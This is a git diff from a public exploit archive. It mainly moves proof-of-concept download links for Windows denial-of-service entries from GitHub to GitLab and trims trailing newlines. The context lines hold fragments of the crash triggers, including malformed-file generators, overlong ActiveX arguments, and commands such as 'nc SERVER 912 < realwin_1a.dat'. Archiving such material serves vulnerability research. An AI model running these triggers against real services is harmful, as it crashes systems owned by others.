(SumatraPDF1.1DOS.pdf) \ No newline at end of file diff --git a/exploits/windows/dos/13887.c b/exploits/windows/dos/13887.c index fefee38e8..9b9a32bc5 100644 --- a/exploits/windows/dos/13887.c +++ b/exploits/windows/dos/13887.c @@ -260,4 +260,4 @@ } void copy_str(i8* v,i8* w,i32 len){ memcpy(v, w, len); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/13888.c b/exploits/windows/dos/13888.c index 227f16a48..f34ea1102 100644 --- a/exploits/windows/dos/13888.c +++ b/exploits/windows/dos/13888.c @@ -165,5 +165,4 @@ void error_handle(void){ perror("\nError"); exit(1); - } - + } \ No newline at end of file diff --git a/exploits/windows/dos/13919.c b/exploits/windows/dos/13919.c index f55410799..ec69632bd 100644 --- a/exploits/windows/dos/13919.c +++ b/exploits/windows/dos/13919.c @@ -1615,4 +1615,4 @@ void error_handle(){ perror("\nError"); exit(1); - } + } \ No newline at end of file diff --git a/exploits/windows/dos/13959.txt b/exploits/windows/dos/13959.txt index 800174878..82ea67d2e 100644 --- a/exploits/windows/dos/13959.txt +++ b/exploits/windows/dos/13959.txt @@ -225,7 +225,7 @@ cause a crash of the server: http://aluigi.org/poc/teamspeakrack.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/13959.zip (teamspeakrack.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/13959.zip (teamspeakrack.zip) ####################################################################### diff --git a/exploits/windows/dos/14286.txt b/exploits/windows/dos/14286.txt index a2f34f1a7..e747ba7c7 100644 --- a/exploits/windows/dos/14286.txt +++ b/exploits/windows/dos/14286.txt @@ -84,7 +84,7 @@ invalid memory accesses. http://aluigi.org/testz/udpsz.zip or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14286.zip (grawpoc.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14286.zip (grawpoc.zip) A] udpsz -C "0100 13 0003 0000 ffffffff" -b 0x41 SERVER 16250 3000 diff --git a/exploits/windows/dos/14346.txt b/exploits/windows/dos/14346.txt index dbabfc6e1..d6366e294 100644 --- a/exploits/windows/dos/14346.txt +++ b/exploits/windows/dos/14346.txt @@ -33,4 +33,4 @@ - PoC: http://www.zeroscience.mk/codes/zsl_poc17.shw.rar or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14346.rar (zsl_poc17.shw.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14346.rar (zsl_poc17.shw.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14349.html b/exploits/windows/dos/14349.html index f0dd31a73..389789669 100644 --- a/exploits/windows/dos/14349.html +++ b/exploits/windows/dos/14349.html @@ -28,7 +28,4 @@ ctx.getImageData(0,0,0x20000,0x20000); Original Advisory: -http://pouya.info/blog/userfiles/vul/OperaCC.pdf - - - +http://pouya.info/blog/userfiles/vul/OperaCC.pdf \ No newline at end of file diff --git a/exploits/windows/dos/14414.txt b/exploits/windows/dos/14414.txt index cc268b337..dd7df985b 100644 --- a/exploits/windows/dos/14414.txt +++ b/exploits/windows/dos/14414.txt @@ -64,7 +64,7 @@ are no limitations. http://aluigi.org/fakep/unrealfp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14414.zip (unrealfp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14414.zip (unrealfp.zip) unrealfp -x 2 -c "STEAMBLOB B=" SERVER PORT diff --git a/exploits/windows/dos/14424.txt b/exploits/windows/dos/14424.txt index e98895fe7..39313730f 100644 --- a/exploits/windows/dos/14424.txt +++ b/exploits/windows/dos/14424.txt @@ -74,7 +74,7 @@ No other technical details are available at the moment. http://aluigi.org/poc/fearless.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14424.zip (fearless.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14424.zip (fearless.zip) tuned to work with the F.E.A.R. series, so Project Origin included. diff --git a/exploits/windows/dos/14593.html b/exploits/windows/dos/14593.html index 6ceb98a3a..8ccd5f3eb 100644 --- a/exploits/windows/dos/14593.html +++ b/exploits/windows/dos/14593.html @@ -20,4 +20,4 @@ target.InitLicenKeys arg1 ,nseh ,seh ,arg4 ,arg5 </script> -hadji samir +hadji samir \ No newline at end of file diff --git a/exploits/windows/dos/14642.txt b/exploits/windows/dos/14642.txt index e6c2673a4..5feec4ff2 100644 --- a/exploits/windows/dos/14642.txt +++ b/exploits/windows/dos/14642.txt @@ -8,4 +8,4 @@ After reading the paper, I started studying the TTF format. After initial resear Writeup and proof of concept files included in archive file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14642.tgz (VA010-003.tgz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14642.tgz (VA010-003.tgz) \ No newline at end of file diff --git a/exploits/windows/dos/14671.py b/exploits/windows/dos/14671.py index 5b039f7bd..20c9a8fb3 100755 --- a/exploits/windows/dos/14671.py +++ b/exploits/windows/dos/14671.py @@ -53,4 +53,4 @@ try: print "[+] File created successfully !" sys.exit(0) except: - print "[-] Error cant write file to system\n" + print "[-] Error cant write file to system\n" \ No newline at end of file diff --git a/exploits/windows/dos/14683.py b/exploits/windows/dos/14683.py index 968844e1b..0fbeffefe 100755 --- a/exploits/windows/dos/14683.py +++ b/exploits/windows/dos/14683.py @@ -73,7 +73,4 @@ try: except: print ("[*] Success! We crashed the server in %d attempts." % x); - print ("[i] [pocoftheday.blogspot.com]"); - - - + print ("[i] [pocoftheday.blogspot.com]"); \ No newline at end of file diff --git a/exploits/windows/dos/14767.txt b/exploits/windows/dos/14767.txt index d6c1e397d..427dbcaf8 100644 --- a/exploits/windows/dos/14767.txt +++ b/exploits/windows/dos/14767.txt @@ -35,4 +35,4 @@ Reproducing this bug: Reproduction is very simple. The first 3 bytes of any SWF file is FWS, to reproduce the issue we need to replace the first byte 'F' with an '`' to make the magic look like '`WS' and load this file into Flash Movie Player. -POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14767.tar.gz \ No newline at end of file +POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14767.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/14882.txt b/exploits/windows/dos/14882.txt index b596bdf95..01745f1e3 100644 --- a/exploits/windows/dos/14882.txt +++ b/exploits/windows/dos/14882.txt @@ -120,4 +120,4 @@ Stack Reproduction Use attached PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14883.txt b/exploits/windows/dos/14883.txt index cce12ef34..c4d52c93f 100644 --- a/exploits/windows/dos/14883.txt +++ b/exploits/windows/dos/14883.txt @@ -100,4 +100,4 @@ char data[18448] char data[7807] = -120 PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14892.py b/exploits/windows/dos/14892.py index b98769310..7242b3f87 100755 --- a/exploits/windows/dos/14892.py +++ b/exploits/windows/dos/14892.py @@ -46,5 +46,4 @@ data2 = ( wizz = open("Mahboul-3lik.xspf","w") wizz.write(data1 + buff + data2) -wizz.close() - +wizz.close() \ No newline at end of file diff --git a/exploits/windows/dos/14937.py b/exploits/windows/dos/14937.py index 103d6041c..89fa1d77d 100755 --- a/exploits/windows/dos/14937.py +++ b/exploits/windows/dos/14937.py @@ -17,5 +17,4 @@ boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20") buff = ("\x41" * 50000 ) wizz = open("Mahboul-3lik.wav","w") wizz.write(boom + buff ) -wizz.close() - +wizz.close() \ No newline at end of file diff --git a/exploits/windows/dos/14949.py b/exploits/windows/dos/14949.py index bcf7f6855..938691377 100755 --- a/exploits/windows/dos/14949.py +++ b/exploits/windows/dos/14949.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14949.zip (moaub-day9-ba.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14949.zip (moaub-day9-ba.zip) ''' diff --git a/exploits/windows/dos/14971.py b/exploits/windows/dos/14971.py index 1ca090b38..9c202e641 100755 --- a/exploits/windows/dos/14971.py +++ b/exploits/windows/dos/14971.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14971.zip (moaub-11-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip) ''' ''' diff --git a/exploits/windows/dos/14974.txt b/exploits/windows/dos/14974.txt index 97a86f96f..367ae0b6c 100644 --- a/exploits/windows/dos/14974.txt +++ b/exploits/windows/dos/14974.txt @@ -28,4 +28,4 @@ http://elotrolad0.blogspot.com/2010/09/hp-data-protector-media-operations-611.ht by r0i -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14974.rar (HP_Data_Protector_Poc.rar) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14974.rar (HP_Data_Protector_Poc.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14992.py b/exploits/windows/dos/14992.py index 8152f72e9..12ec72b4c 100755 --- a/exploits/windows/dos/14992.py +++ b/exploits/windows/dos/14992.py @@ -22,7 +22,7 @@ CVE : CVE-2010-3000 # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14992.zip (moaub-13-exploit.zip) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14992.zip (moaub-13-exploit.zip) import sys diff --git a/exploits/windows/dos/15019.txt b/exploits/windows/dos/15019.txt index f4f92e6ed..552f2a5a9 100644 --- a/exploits/windows/dos/15019.txt +++ b/exploits/windows/dos/15019.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15019.rar (HFPicture_PoC.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15019.rar (HFPicture_PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15027.py b/exploits/windows/dos/15027.py index b13f6fb1a..251f6d4df 100755 --- a/exploits/windows/dos/15027.py +++ b/exploits/windows/dos/15027.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15027.zip (moaub-17-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15027.zip (moaub-17-exploit.zip) ''' ''' Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution diff --git a/exploits/windows/dos/15034.txt b/exploits/windows/dos/15034.txt index ee7141b1b..4c073ea5e 100644 --- a/exploits/windows/dos/15034.txt +++ b/exploits/windows/dos/15034.txt @@ -5,4 +5,4 @@ # Version: winxp/sp3 # Tested on: winxp/sp2/sp3 -BMP File: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15034.zip \ No newline at end of file +BMP File: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15034.zip \ No newline at end of file diff --git a/exploits/windows/dos/15065.txt b/exploits/windows/dos/15065.txt index 29140fa9d..6f5544731 100644 --- a/exploits/windows/dos/15065.txt +++ b/exploits/windows/dos/15065.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/moaub-21-microsoft-excel-wopt-record-parsing-heap-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15065.rar (moaub-21-exploit.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15065.rar (moaub-21-exploit.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15076.py b/exploits/windows/dos/15076.py index 1d6246793..a37870659 100755 --- a/exploits/windows/dos/15076.py +++ b/exploits/windows/dos/15076.py @@ -19,7 +19,7 @@ Twitter : @abysssec http://www.exploit-db.com/moaub-22-adobe-shockwave-director-tsac-chunk-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15076.zip (moaub-22-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15076.zip (moaub-22-exploit.zip) ''' diff --git a/exploits/windows/dos/15088.txt b/exploits/windows/dos/15088.txt index 1fd01a74c..56a49365d 100644 --- a/exploits/windows/dos/15088.txt +++ b/exploits/windows/dos/15088.txt @@ -18,4 +18,4 @@ CVE : NO CVE here is BA : http://www.exploit-db.com/moaub-23-microsoft-office-excel-2002-memory-corruption-vulnerability-0day/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15088.zip (moaub-23-excel-poc.zip) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15088.zip (moaub-23-excel-poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15096.py b/exploits/windows/dos/15096.py index a11937e78..d04d2cbe4 100755 --- a/exploits/windows/dos/15096.py +++ b/exploits/windows/dos/15096.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip) ''' ''' diff --git a/exploits/windows/dos/15104.py b/exploits/windows/dos/15104.py index a1ad75e58..b38ad491d 100755 --- a/exploits/windows/dos/15104.py +++ b/exploits/windows/dos/15104.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15104.zip (moaub-25-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip) ''' diff --git a/exploits/windows/dos/15148.txt b/exploits/windows/dos/15148.txt index adb211e10..97edba9c1 100644 --- a/exploits/windows/dos/15148.txt +++ b/exploits/windows/dos/15148.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1245 here is BA : http://www.exploit-db.com/moaub-29-microsoft-excel-sxview-record-parsing-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15148.rar (moaub-29-exploit.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15148.rar (moaub-29-exploit.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15158.py b/exploits/windows/dos/15158.py index eb98cbf6d..62a4db7dc 100755 --- a/exploits/windows/dos/15158.py +++ b/exploits/windows/dos/15158.py @@ -21,7 +21,7 @@ MOAUB Number : MOAUB-FINAL http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15158.zip (moaub-30-PoC.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15158.zip (moaub-30-PoC.zip) ''' import sys diff --git a/exploits/windows/dos/15248.txt b/exploits/windows/dos/15248.txt index 8dcdb3d06..80f87fe2d 100644 --- a/exploits/windows/dos/15248.txt +++ b/exploits/windows/dos/15248.txt @@ -102,7 +102,7 @@ of the track. http://aluigi.org/poc/winamp_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15248.zip (winamp_1_13Oct10.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15248.zip (winamp_1_13Oct10.zip) ####################################################################### diff --git a/exploits/windows/dos/15259.txt b/exploits/windows/dos/15259.txt index 9daae8bb8..4eb7ec78d 100644 --- a/exploits/windows/dos/15259.txt +++ b/exploits/windows/dos/15259.txt @@ -75,7 +75,7 @@ caused by the usage of strcpy() with the data supplied by the attacker. http://aluigi.org/poc/realwin_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15259.zip (realwin_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15259.zip (realwin_1.zip) nc SERVER 912 < realwin_1a.dat nc SERVER 912 < realwin_1b.dat diff --git a/exploits/windows/dos/15260.txt b/exploits/windows/dos/15260.txt index 0859130bd..1e0dca3ad 100644 --- a/exploits/windows/dos/15260.txt +++ b/exploits/windows/dos/15260.txt @@ -60,7 +60,7 @@ didn't result exploitable. http://aluigi.org/poc/unirpcd_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15260.zip (unirpcd_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15260.zip (unirpcd_1.zip) ####################################################################### diff --git a/exploits/windows/dos/15407.txt b/exploits/windows/dos/15407.txt index f46d3211c..67cdd6af7 100644 --- a/exploits/windows/dos/15407.txt +++ b/exploits/windows/dos/15407.txt @@ -121,4 +121,4 @@ Followup: MachineOwner 3.Proof of concept is in poc.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15407.zip (poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15407.zip (poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15408.html b/exploits/windows/dos/15408.html index c7fa537f5..636404407 100644 --- a/exploits/windows/dos/15408.html +++ b/exploits/windows/dos/15408.html @@ -16,6 +16,4 @@ arg1=String(65535, "A") target.SearchByFormula arg1 -</script> - - +</script> \ No newline at end of file diff --git a/exploits/windows/dos/15419.txt b/exploits/windows/dos/15419.txt index a6be8a3c3..b79a44afd 100644 --- a/exploits/windows/dos/15419.txt +++ b/exploits/windows/dos/15419.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15419.bin (xpl_pdf.bin) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15419.bin (xpl_pdf.bin) http://extraexploit.blogspot.com/2010/11/full-disclosure-xplpdf-adober-reader-94.html \ No newline at end of file diff --git a/exploits/windows/dos/15426.txt b/exploits/windows/dos/15426.txt index fe6b85300..b1cabe944 100644 --- a/exploits/windows/dos/15426.txt +++ b/exploits/windows/dos/15426.txt @@ -58,4 +58,4 @@ short BranchOffset, value -305 BranchOffset is located @ E6h-E7h -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15429.txt b/exploits/windows/dos/15429.txt index 9bd27a90b..25ca02770 100644 --- a/exploits/windows/dos/15429.txt +++ b/exploits/windows/dos/15429.txt @@ -19,8 +19,4 @@ Target Directory : "c:\fuzz\bkf\" #Create the directory if it's dosent existe in Execute menu Application : "C:\WINDOWS\system32\ntbackup.exe" -Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash - - - - +Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash \ No newline at end of file diff --git a/exploits/windows/dos/15444.txt b/exploits/windows/dos/15444.txt index ea357b213..a3162bfe7 100644 --- a/exploits/windows/dos/15444.txt +++ b/exploits/windows/dos/15444.txt @@ -122,4 +122,4 @@ Followup: MachineOwner 3.PoC is in NtOpenKey_poc.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15444.zip (NtOpenKey_poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15444.zip (NtOpenKey_poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15514.txt b/exploits/windows/dos/15514.txt index 94cdae8aa..0d5614212 100644 --- a/exploits/windows/dos/15514.txt +++ b/exploits/windows/dos/15514.txt @@ -2,4 +2,4 @@ Foxit Reader 4.1.1 is subject to a stack overflow vulnerability when parsing ove The included PoC results in a SEH overwrite. The exception must be passed twice in order to reach the overwritten handler. This vulnerability was reported to the vendor and was patched in Foxit Reader 4.2. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15514.pdf (foxit_411_poc.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15514.pdf (foxit_411_poc.pdf) \ No newline at end of file diff --git a/exploits/windows/dos/15581.txt b/exploits/windows/dos/15581.txt index 256db3170..b006a81d3 100644 --- a/exploits/windows/dos/15581.txt +++ b/exploits/windows/dos/15581.txt @@ -61,4 +61,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4978.php PoC: http://www.zeroscience.mk/codes/pocs_ens_ism.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15581.rar (pocs_ens_ism.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15581.rar (pocs_ens_ism.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15698.html b/exploits/windows/dos/15698.html index fecb81715..851ef5bf0 100644 --- a/exploits/windows/dos/15698.html +++ b/exploits/windows/dos/15698.html @@ -9,7 +9,7 @@ File Description : Macromedia Flash Player 6.0 r88 Notes : This triggers a NULL Pointer reference on a register operation Notes : The "AllowScriptAccess" parameter is written to ESI and EAX Notes : I was not able to gain execution, can you? -Flash 6: : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15698.rar +Flash 6: : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15698.rar ********************************************************************************************** --> <object id=TestObj classid="CLSID:{D27CDB6E-AE6D-11cf-96B8-444553540000}" style="width:100;height:350"> diff --git a/exploits/windows/dos/15992.txt b/exploits/windows/dos/15992.txt index 82952830d..6de6e98cd 100644 --- a/exploits/windows/dos/15992.txt +++ b/exploits/windows/dos/15992.txt @@ -89,7 +89,7 @@ copying the input data in a temporary buffer of about 60 bytes: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15992.zip (udpsz.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip (udpsz.zip) udpsz -T -b a -C 020101 SERVER 46823 1000 diff --git a/exploits/windows/dos/16120.py b/exploits/windows/dos/16120.py index eae0d609d..d601da3c9 100755 --- a/exploits/windows/dos/16120.py +++ b/exploits/windows/dos/16120.py @@ -34,5 +34,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/16121.py b/exploits/windows/dos/16121.py index 177d9bec0..8475cae02 100755 --- a/exploits/windows/dos/16121.py +++ b/exploits/windows/dos/16121.py @@ -21,8 +21,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - - - - + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/1615.txt b/exploits/windows/dos/1615.txt index 8e1445e03..33cf5e24e 100644 --- a/exploits/windows/dos/1615.txt +++ b/exploits/windows/dos/1615.txt @@ -1,4 +1,4 @@ -# Full archive at https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1615.rar (excel_03262006.rar) +# Full archive at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1615.rar (excel_03262006.rar) Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0 Date : 02/12/2006 diff --git a/exploits/windows/dos/16230.py b/exploits/windows/dos/16230.py index 8185e4cc2..01c0c4046 100755 --- a/exploits/windows/dos/16230.py +++ b/exploits/windows/dos/16230.py @@ -99,4 +99,4 @@ try: except: - print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" + print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" \ No newline at end of file diff --git a/exploits/windows/dos/16254.txt b/exploits/windows/dos/16254.txt index f53b054c8..fa529088f 100644 --- a/exploits/windows/dos/16254.txt +++ b/exploits/windows/dos/16254.txt @@ -44,7 +44,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php -------- PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16254.rar (nitropdf_poc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/16254.rar (nitropdf_poc.rar) http://www.zeroscience.mk/codes/nitropdf_poc.rar -------- \ No newline at end of file diff --git a/exploits/windows/dos/16255.pl b/exploits/windows/dos/16255.pl index e3b7b3ac6..b5521684c 100755 --- a/exploits/windows/dos/16255.pl +++ b/exploits/windows/dos/16255.pl @@ -11,4 +11,4 @@ open($FILE,">$file"); print $FILE $junk; close($FILE); print "Files Created successfully\n"; -sleep(1); +sleep(1); \ No newline at end of file diff --git a/exploits/windows/dos/17019.txt b/exploits/windows/dos/17019.txt index cf79b68b8..179b47640 100644 --- a/exploits/windows/dos/17019.txt +++ b/exploits/windows/dos/17019.txt @@ -181,7 +181,7 @@ From rvrender.dll (base address 63AE0000): http://aluigi.org/poc/real_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17019.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17019.zip the amount of data to copy is the 32bit big endian value located at offset 0x7801 of real_5.ivr. diff --git a/exploits/windows/dos/17023.txt b/exploits/windows/dos/17023.txt index b749673bc..048bd4433 100644 --- a/exploits/windows/dos/17023.txt +++ b/exploits/windows/dos/17023.txt @@ -13,8 +13,8 @@ http://aluigi.org/adv/genesis_11-adv.txt http://aluigi.org/adv/genesis_12-adv.txt http://aluigi.org/adv/genesis_13-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz) ####################################################################### @@ -105,7 +105,7 @@ The Code =========== http://aluigi.org/poc/genesis_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-1.zip (genesis_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-1.zip (genesis_1.zip) ####################################################################### @@ -157,7 +157,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 1 SERVER @@ -212,7 +212,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 2 SERVER @@ -280,7 +280,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) 